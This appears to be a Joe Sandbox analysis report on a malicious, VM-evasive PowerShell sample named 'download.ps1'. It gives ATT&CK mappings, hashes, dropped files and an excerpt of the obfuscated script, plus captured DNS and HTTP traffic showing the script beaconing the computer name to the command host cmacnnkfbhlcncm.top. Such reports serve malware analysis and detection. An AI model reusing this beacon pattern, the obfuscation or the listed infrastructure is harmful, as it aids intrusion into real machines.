Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote ServicesData from Local System1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive12
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps13%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
192.178.50.68
truefalse
    high
    cmacnnkfbhlcncm.top
    45.61.136.138
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
        high
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://www.apache.org/licenses/LICENSE-2.0.htmlXzEpowershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpfalse
                unknown
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://$a4j1wlqhkmzgpot67gw9l3qf0madz/$zs0pgc72wrmfea1.php?id=$env:computername&key=$frnyclkgbjpa&s=powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://go.micropowershell.exe, 00000000.00000002.55091794002.000001A8D9F46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D92E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D939D000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://pesterbdd.com/images/Pester.pngXzEpowershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://contoso.com/Iconpowershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://cmacnnkfbhlcncm.toppowershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.microsoft.coSpowershell.exe, 00000000.00000002.55125120725.000001A8EFDE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://github.com/Pester/PesterXzEpowershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084opowershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/recaptcha/api.jspowershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A40000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSpowershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.google.compowershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.quovadis.bm0powershell.exe, 00000000.00000002.55123452403.000001A8EFBE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://aka.ms/pscore68powershell.exe, 00000000.00000002.55091794002.000001A8D7A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.55123452403.000001A8EFBE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.micrpowershell.exe, 00000000.00000002.55127045448.000001A8EFF40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.55091794002.000001A8D7A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                192.178.50.68
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                45.61.136.138
                                                                cmacnnkfbhlcncm.topUnited States
                                                                40676AS40676USfalse
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1579000
                                                                Start date and time:2024-12-20 17:38:29 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 33s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                Run name:Suspected VM Detection
                                                                Number of analysed new started processes analysed:4
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:download.ps1
                                                                Detection:MAL
                                                                Classification:mal64.evad.winPS1@2/7@2/2
                                                                EGA Information:Failed
                                                                HCA Information:Failed
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .ps1
                                                                • Stop behavior analysis, all processes terminated
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 4948 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • VT rate limit hit for: download.ps1
                                                                TimeTypeDescription
                                                                11:40:34API Interceptor29x Sleep call for process: powershell.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/rz932vog4whtr.php?id=user-PC&key=63562548914&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/h5raxn90w1htr.php?id=user-PC&key=130484823816&s=527
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                cmacnnkfbhlcncm.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                • 107.160.112.122
                                                                QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                • 107.160.131.254
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                • 23.179.110.68
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                No context
                                                                No context
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:@...e...........................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.756326006283296
                                                                Encrypted:false
                                                                SSDEEP:96:8tQ4cMSZzRCLG6qK4kvhkvCCtpQTpZ2JHCQTpZ2mH/:mM1lop09p0k
                                                                MD5:740FD448C818098ACC1F7BCA7A9A568A
                                                                SHA1:BB5FFCA57B241092FC1C8412BE067CEE079A1334
                                                                SHA-256:212779913545BB1598F2AC071BB1CF346697E37FE00B31C7BCCCA24B755D489B
                                                                SHA-512:3D641C7A84ADCBDDEEAFFC08A15C063D5057E6A60B93048E25159E779B0CE09BD4694109B15301EF8B7317D8DCA743ACC71762D0036D21198F3283051959103C
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S....X=..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...X....R..o.D..R......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y......B......................A!.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......"S.Y......D......................P..R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y......E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.U..Windows.@......"S.Y......F.....................{k..W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y.U....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y.U....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y(I....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y......i...........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.756326006283296
                                                                Encrypted:false
                                                                SSDEEP:96:8tQ4cMSZzRCLG6qK4kvhkvCCtpQTpZ2JHCQTpZ2mH/:mM1lop09p0k
                                                                MD5:740FD448C818098ACC1F7BCA7A9A568A
                                                                SHA1:BB5FFCA57B241092FC1C8412BE067CEE079A1334
                                                                SHA-256:212779913545BB1598F2AC071BB1CF346697E37FE00B31C7BCCCA24B755D489B
                                                                SHA-512:3D641C7A84ADCBDDEEAFFC08A15C063D5057E6A60B93048E25159E779B0CE09BD4694109B15301EF8B7317D8DCA743ACC71762D0036D21198F3283051959103C
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S....X=..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...X....R..o.D..R......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y......B......................A!.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......"S.Y......D......................P..R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y......E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.U..Windows.@......"S.Y......F.....................{k..W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y.U....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y.U....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y(I....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y......i...........
                                                                File type:ASCII text, with very long lines (10634), with CRLF line terminators
                                                                Entropy (8bit):5.946888251796256
                                                                TrID:
                                                                  File name:download.ps1
                                                                  File size:20'668 bytes
                                                                  MD5:15c696b54fec704854a06052972d8da1
                                                                  SHA1:ed686be71d4fd74a17b80d566d6d2303704ead3f
                                                                  SHA256:54b46f36f001fa7f35af7bd1deaa1b835a3145b18feb98f2584c08220c2dc988
                                                                  SHA512:21bcebca8512824ff812cc7322ac63bef7fe54301df3bf5cf2e51abfbe84a0b4a5b4288e50afc25f39de0fec8d0ab6389e25f4883f2e54f42418e2fe43511d4e
                                                                  SSDEEP:384:9ZzHKrpx6n9uIv1HfCSdd7RuylIkfHGhmPPOFD4nBK9+787LroYnlyXhMPI:/HyIdHfCSdRH5u0PMEnB+GOrpnkhMg
                                                                  TLSH:5F927D967384E492C1CA963FA803BC057B56B57ED5E37EC8F2A6A6C273823407E44DD1
                                                                  File Content Preview:$xbwidsplqrogk=$executioncontext;$isreisertionreonbeoran = ([ChAr[]]@((333-(-225+505)),(-6482+6534),(-9505+9562),(397650/7953),(514920/9195),(7353-7299),(-4080+(20353256/(-1086+(53618482/8926)))),(232155/4221),(4294-(33263433/7847)),(-4936+4986),(424592/7
                                                                  Icon Hash:3270d6baae77db44
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-20T17:40:36.910647+01002859391ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.11.20607311.1.1.153UDP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 20, 2024 17:40:37.416899920 CET4976080192.168.11.2045.61.136.138
                                                                  Dec 20, 2024 17:40:37.634144068 CET804976045.61.136.138192.168.11.20
                                                                  Dec 20, 2024 17:40:37.634288073 CET4976080192.168.11.2045.61.136.138
                                                                  Dec 20, 2024 17:40:37.645302057 CET4976080192.168.11.2045.61.136.138
                                                                  Dec 20, 2024 17:40:37.862582922 CET804976045.61.136.138192.168.11.20
                                                                  Dec 20, 2024 17:40:37.893332958 CET804976045.61.136.138192.168.11.20
                                                                  Dec 20, 2024 17:40:37.939701080 CET4976080192.168.11.2045.61.136.138
                                                                  Dec 20, 2024 17:40:38.025832891 CET4976180192.168.11.20192.178.50.68
                                                                  Dec 20, 2024 17:40:38.155025005 CET8049761192.178.50.68192.168.11.20
                                                                  Dec 20, 2024 17:40:38.155256033 CET4976180192.168.11.20192.178.50.68
                                                                  Dec 20, 2024 17:40:38.155426025 CET4976180192.168.11.20192.178.50.68
                                                                  Dec 20, 2024 17:40:38.284651995 CET8049761192.178.50.68192.168.11.20
                                                                  Dec 20, 2024 17:40:38.607651949 CET8049761192.178.50.68192.168.11.20
                                                                  Dec 20, 2024 17:40:38.607664108 CET8049761192.178.50.68192.168.11.20
                                                                  Dec 20, 2024 17:40:38.607844114 CET4976180192.168.11.20192.178.50.68
                                                                  Dec 20, 2024 17:40:38.608977079 CET4976180192.168.11.20192.178.50.68
                                                                  Dec 20, 2024 17:40:38.738368988 CET8049761192.178.50.68192.168.11.20
                                                                  Dec 20, 2024 17:40:38.752016068 CET8049761192.178.50.68192.168.11.20
                                                                  Dec 20, 2024 17:40:38.752099991 CET8049761192.178.50.68192.168.11.20
                                                                  Dec 20, 2024 17:40:38.752111912 CET8049761192.178.50.68192.168.11.20
                                                                  Dec 20, 2024 17:40:38.752259970 CET4976180192.168.11.20192.178.50.68
                                                                  Dec 20, 2024 17:40:38.902731895 CET4976080192.168.11.2045.61.136.138
                                                                  Dec 20, 2024 17:40:38.902848005 CET4976180192.168.11.20192.178.50.68
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 20, 2024 17:40:36.910646915 CET6073153192.168.11.201.1.1.1
                                                                  Dec 20, 2024 17:40:37.408513069 CET53607311.1.1.1192.168.11.20
                                                                  Dec 20, 2024 17:40:37.894890070 CET5577053192.168.11.201.1.1.1
                                                                  Dec 20, 2024 17:40:38.024840117 CET53557701.1.1.1192.168.11.20
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 20, 2024 17:40:36.910646915 CET192.168.11.201.1.1.10x7541Standard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 17:40:37.894890070 CET192.168.11.201.1.1.10xa5d4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 20, 2024 17:40:37.408513069 CET1.1.1.1192.168.11.200x7541No error (0)cmacnnkfbhlcncm.top45.61.136.138A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 17:40:38.024840117 CET1.1.1.1192.168.11.200xa5d4No error (0)www.google.com192.178.50.68A (IP address)IN (0x0001)false
                                                                  • cmacnnkfbhlcncm.top
                                                                  • www.google.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.11.204976045.61.136.138804948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 17:40:37.645302057 CET215OUTGET /yudn6r4exvhtr.php?id=computer&key=71902578316&s=527 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: cmacnnkfbhlcncm.top
                                                                  Connection: Keep-Alive
                                                                  Dec 20, 2024 17:40:37.893332958 CET166INHTTP/1.1 302 Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 20 Dec 2024 16:40:37 GMT
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Location: http://www.google.com


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.11.2049761192.178.50.68804948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 17:40:38.155426025 CET159OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: www.google.com
                                                                  Connection: Keep-Alive
                                                                  Dec 20, 2024 17:40:38.607651949 CET1289INHTTP/1.1 302 Found
                                                                  Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                  x-hallmonitor-challenge: CgwIhryWuwYQxo7s_QESBGaBmM0
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-rJeDA7g5jCuYQtm7P9-iyQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Date: Fri, 20 Dec 2024 16:40:38 GMT
                                                                  Server: gws
                                                                  Content-Length: 396
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Set-Cookie: AEC=AZ6Zc-VvkB8TtR4Io8-V1fIRX08oWYH-zU3Hva3sW0CavNxCMFrlkEJpq9M; expires=Wed, 18-Jun-2025 16:40:38 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
